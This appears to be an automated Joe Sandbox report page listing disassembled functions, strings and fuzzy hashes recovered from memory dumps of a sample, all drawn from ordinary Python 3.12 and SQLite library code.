Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
String ID: argument 1$argument 2$normalize$str
API String ID: 4101545800-1320425463
Opcode ID: 2dbf24b9019d36270aeee854f5eb720b9aec5d3fd397e623ab08701816bde558
Instruction ID: 14fd16d51f70bb5c44a42fed21446ba68c3c93a9679ca7fe01d1edb9e1fd9593
Opcode Fuzzy Hash: 2dbf24b9019d36270aeee854f5eb720b9aec5d3fd397e623ab08701816bde558
Instruction Fuzzy Hash: D5115EE0F0A6C2D0EA62CB66E5406B56368AB05FC4F5890B6ED0D07794DE3CE58AD760

Function 00007FFBAA464768 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON312 ref: 00007FFBAA464794
_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA4647C9

Strings

str, xrefs: 00007FFBAA4647BB
argument 2, xrefs: 00007FFBAA4647EA
argument 1, xrefs: 00007FFBAA4647B4
is_normalized, xrefs: 00007FFBAA464787, 00007FFBAA4647C2

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_$ArgumentCheckPositional
String ID: argument 1$argument 2$is_normalized$str
API String ID: 3876575403-184702317
Opcode ID: ed7039aedf8594f44b2dcd06c7a3654b924861e91dfb93c4f465d606fbcafc7c
Instruction ID: 3df196d628ed698989964e912123664099e96aa4e273e9310997234cf7fcc86f
Opcode Fuzzy Hash: ed7039aedf8594f44b2dcd06c7a3654b924861e91dfb93c4f465d606fbcafc7c
Instruction Fuzzy Hash: FB01A1E0F19686D4EF51CB62E5806B56364AB06FC4F4880B2ED0D0B654EF3CD48AC320

Function 00007FFBAA5E4DB0 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 330COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA5E4EFB
memcpy.VCRUNTIME140 ref: 00007FFBAA5E4F47
memcpy.VCRUNTIME140 ref: 00007FFBAA5E51BC

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFBAA5E4E5E
foreign key on %s should reference only one column of table %T, xrefs: 00007FFBAA5E4E35
unknown column "%s" in foreign key definition, xrefs: 00007FFBAA5E514C

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 438689982-272990098
Opcode ID: fd81753e9aa9850e33c8090faaef20c6a6f2e69b39017b2b1a283a883e4d74bd
Instruction ID: 14a31de3d822aeeb27052e5d6dd2c64634ca54b4a35c1669b29cbb2a85b646e3
Opcode Fuzzy Hash: fd81753e9aa9850e33c8090faaef20c6a6f2e69b39017b2b1a283a883e4d74bd
Instruction Fuzzy Hash: 98D120A2A0A781C6EB76CB25D04077977AAFB46BC4F4441B9DE9E03785DE3CE442C718

Function 00007FFBAA5849E0 Relevance: 9.3, APIs: 2, Strings: 4, Instructions: 329COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA584B95

Strings

another row available, xrefs: 00007FFBAA585084
abort due to ROLLBACK, xrefs: 00007FFBAA585072
unknown error, xrefs: 00007FFBAA585042
no more rows available, xrefs: 00007FFBAA58507B

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 3510742995-3044471405
Opcode ID: e0751fcfef235c84794730e554eb4966c5351462047d42e6373d045085788445
Instruction ID: b28086c51b50e66864eeb8631eab31b9890bb68579a315dee1c771c1e13b7250
Opcode Fuzzy Hash: e0751fcfef235c84794730e554eb4966c5351462047d42e6373d045085788445
Instruction Fuzzy Hash: 4EF1C6A1A0FA82C1EB668F34E4502B9B3A8FF4AB44F145179DE4E03694DF3DE446D724

Function 00007FFBAA5A49C0 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 260COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA5A4B6E
memcpy.VCRUNTIME140 ref: 00007FFBAA5A4CA6
memcpy.VCRUNTIME140 ref: 00007FFBAA5A4CC0

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5A4A05
%s at line %d of [%.10s], xrefs: 00007FFBAA5A4A1D
database corruption, xrefs: 00007FFBAA5A4A11

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 438689982-3418467682
Opcode ID: 3a72f6d314c914102456c34c9c024b260731ec6175f70502df3334ac74e68f32
Instruction ID: 160c1fa9bc0b35aa0479cf9b4547bfd51f663a3e23cb1249ce52c8be58cd852d
Opcode Fuzzy Hash: 3a72f6d314c914102456c34c9c024b260731ec6175f70502df3334ac74e68f32
Instruction Fuzzy Hash: BBB101B2B09695C6D761CBA9E048B7EB7A9FB85B80F014076DE4D43B85DF38E442C714

Function 00007FFBAA5A7930 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5A7AEC
memmove.VCRUNTIME140 ref: 00007FFBAA5A7B24
memcpy.VCRUNTIME140 ref: 00007FFBAA5A7BF1

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5A79CC
%s at line %d of [%.10s], xrefs: 00007FFBAA5A79E6
database corruption, xrefs: 00007FFBAA5A79DF

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memmove
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 1283327689-3418467682
Opcode ID: d0cd61a46a282bf0fb2f550d918a6c009968a3ecbaac8df5d982ee1dfde62edb
Instruction ID: a7bdaa958bc4ef5ffa20ea415311ed7313070391ba389469ce80ec3fbc6339f0
Opcode Fuzzy Hash: d0cd61a46a282bf0fb2f550d918a6c009968a3ecbaac8df5d982ee1dfde62edb
Instruction Fuzzy Hash: 5891BDB2B09281DAD7228B35D5842BD7BE8FB41B44F048172DF4987685DF3CE9A2C724

Function 00007FFBAB6A2CB0 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2D16
PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2D42
PyNumber_Remainder.PYTHON312 ref: 00007FFBAB6A2D5F
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2D76
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2D8A
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2DE4

Part of subcall function 00007FFBAB6A3590: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A3599
Part of subcall function 00007FFBAB6A3590: fprintf.MSPDB140-MSVCRT ref: 00007FFBAB6A35A9
Part of subcall function 00007FFBAB6A3590: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A35B3
Part of subcall function 00007FFBAB6A3590: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A35BC
Part of subcall function 00007FFBAB6A3590: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A35C2

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$FromLong_Ssize_t__acrt_iob_func$Number_Remainderabortfflushfprintf
String ID:
API String ID: 1333916573-0
Opcode ID: 1ff0950ba76d1fb5de8f3a40737609fc14ed6e45cecf514f6e3c309322584276
Instruction ID: 589fc1261997a02a0556f785ffd3fe54db725b9babff0a6a40adff38a9d19198
Opcode Fuzzy Hash: 1ff0950ba76d1fb5de8f3a40737609fc14ed6e45cecf514f6e3c309322584276
Instruction Fuzzy Hash: B441A6B1A8B50241EE5A5F2DED50378A2B0AF49BE0F48A134DE7E477E5DF2CE4458700

Function 00007FFBAB6A2B70 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2BCC
PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2BF8
PyNumber_Multiply.PYTHON312 ref: 00007FFBAB6A2C10
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2C30
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2C44
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2C86

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$FromLong_Ssize_t$MultiplyNumber_
String ID:
API String ID: 3214704217-0
Opcode ID: e441c8e1654ce7b2f422eefc1750921705619e20d6a3389d9b7057bf79d9000f
Instruction ID: 17e56b9a3ae22da02c53f8aeba373f3efa2660c57010f4a358dba6d161b29fc3
Opcode Fuzzy Hash: e441c8e1654ce7b2f422eefc1750921705619e20d6a3389d9b7057bf79d9000f
Instruction Fuzzy Hash: 5B3117B2A4A50642EE5A4F3DDD54378A2B0AF55BA4F48A138DE3E477E4DE2CE4518700

Function 00007FFBAB6A2920 Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2961
PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A299F
PyNumber_Add.PYTHON312 ref: 00007FFBAB6A29B7
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29D7
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29EB
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2A2D

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$FromLong_Ssize_t$Number_
String ID:
API String ID: 4245833954-0
Opcode ID: ae72d080b4b55a948d5582023073e92d7aff9d277a6dfd1cb9816ae3c140e2c2
Instruction ID: 60ef4ed83e1f5a0f8c972f056e4e5edad7554a213175f5be01511c8838e946cc
Opcode Fuzzy Hash: ae72d080b4b55a948d5582023073e92d7aff9d277a6dfd1cb9816ae3c140e2c2
Instruction Fuzzy Hash: 783145B2A4AA4685EE5A4B3EDD64378E2B0AF44BA4F44A134DF7D467F5DF2CE4418300

Function 00007FFBAB6A2A50 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2A85
PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2ABF
PyNumber_Subtract.PYTHON312 ref: 00007FFBAB6A2AD7
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2AF7
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2B0B
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2B4D

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$FromLong_Ssize_t$Number_Subtract
String ID:
API String ID: 2424657569-0
Opcode ID: aeebb34f4fc22b334b36647e21926670cdad37f7e6ebb6e2507bbb1c10b61d03
Instruction ID: 330f321f4add0415e8f5d7a523e98d5c72a999f42bce7cbc923560f109d1981d
Opcode Fuzzy Hash: aeebb34f4fc22b334b36647e21926670cdad37f7e6ebb6e2507bbb1c10b61d03
Instruction Fuzzy Hash: E8316672A4AA4286EE564F29ED54379A3B0EF48B94F44A039DF6D077E5DE3CE441C700

Function 00007FFBAB6A3080 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

PyUnicode_New.PYTHON312 ref: 00007FFBAB6A30FF
PyErr_SetString.PYTHON312 ref: 00007FFBAB6A31E4
PyErr_SetString.PYTHON312 ref: 00007FFBAB6A3207

Strings

Python int too large to convert to C ssize_t, xrefs: 00007FFBAB6A31FD
string index out of range, xrefs: 00007FFBAB6A31DA

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String$Unicode_
String ID: Python int too large to convert to C ssize_t$string index out of range
API String ID: 2250126396-644864186
Opcode ID: e36458edd2254e28eaa8631afe286072e5f7bd0a67a5b6a46e6ef0c44dcb495f
Instruction ID: e53e35b5f3a33f82b1bd49afb227a1b1bbb87cea9c008eee0de613e6a71e49b3
Opcode Fuzzy Hash: e36458edd2254e28eaa8631afe286072e5f7bd0a67a5b6a46e6ef0c44dcb495f
Instruction Fuzzy Hash: 6F4143B6B0650186EF258B2EC8A13B9B7B0FB98B44F98A139CE5E43761DE2DD545C700

Function 00007FFBAB6A2F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A2FB6

Strings

division by zero, xrefs: 00007FFBAB6A2FAC

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: division by zero
API String ID: 1450464846-3764743415
Opcode ID: 1f310e5c3776cb982e72da88537671f8547cf76eb46f26856b816b508ecd4924
Instruction ID: 331039eda97eeb15ee2c2797d0140c990e1aa848f16212e156cea12b48321527
Opcode Fuzzy Hash: 1f310e5c3776cb982e72da88537671f8547cf76eb46f26856b816b508ecd4924
Instruction Fuzzy Hash: CA2165B1A5AA0245EE578B3DDD54674E2B1AF54BE0F18E334DE3E163E5EE2CE4908600

Function 00007FFBAB6B2EFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2F04
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2FDA
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2FF1
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B3007

Strings

<module>, xrefs: 00007FFBAB6B3018

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: 4b12f555bacad9522f59093536ead85a57240267a6d3aa3ff40fce1b0501a7e8
Instruction ID: 658d2f2662cf96fa4479ee43a463a34670c5446a1944b33a29436f701a54c180
Opcode Fuzzy Hash: 4b12f555bacad9522f59093536ead85a57240267a6d3aa3ff40fce1b0501a7e8
Instruction Fuzzy Hash: 3031A4B5A8AB4681EA169FA9FC50574B3B4FB45B80F44A83ADD6E43770DF3CE0568700

Function 00007FFBAB6B326D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B3273
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B3331
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B3348
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B335E

Strings

<module>, xrefs: 00007FFBAB6B336F

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: 1860a7d5ba5a0637c41751a3ce46a500ea5aac3d17db15aaa5db88cbc2a32e66
Instruction ID: b8b20d691e3430bda8de4a62e56748dde8851aa30b5bded3dd28375eb3ae02a7
Opcode Fuzzy Hash: 1860a7d5ba5a0637c41751a3ce46a500ea5aac3d17db15aaa5db88cbc2a32e66
Instruction Fuzzy Hash: 7E31EAB6E8AB4680EA428FA9FC505B5B3B4BB14790F40E835DC6D47774EF3DA1508750

Function 00007FFBAB6B2701 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2707
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B27AD
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B27C4
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B27DA

Strings

<module>, xrefs: 00007FFBAB6B27EB

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: 3f2332356931184e6501015defa88c1d245f7b25bfe9b71bbf2c72ea6a00fa8a
Instruction ID: a22c1298a3ad9eed5d9136d6fc7e5be2fc33450d24ea16fa6459eafb4d251eb0
Opcode Fuzzy Hash: 3f2332356931184e6501015defa88c1d245f7b25bfe9b71bbf2c72ea6a00fa8a
Instruction Fuzzy Hash: 8931B1B5A8AB4681FA169FA9ED501B4A3B4FF14B90F44A83ACD2E07770DF3CA154C740

Function 00007FFBAA464694 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA4646C4
PyType_IsSubtype.PYTHON312 ref: 00007FFBAA464724

Strings

east_asian_width, xrefs: 00007FFBAA4646BD
a unicode character, xrefs: 00007FFBAA4646AF
argument, xrefs: 00007FFBAA4646B6

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
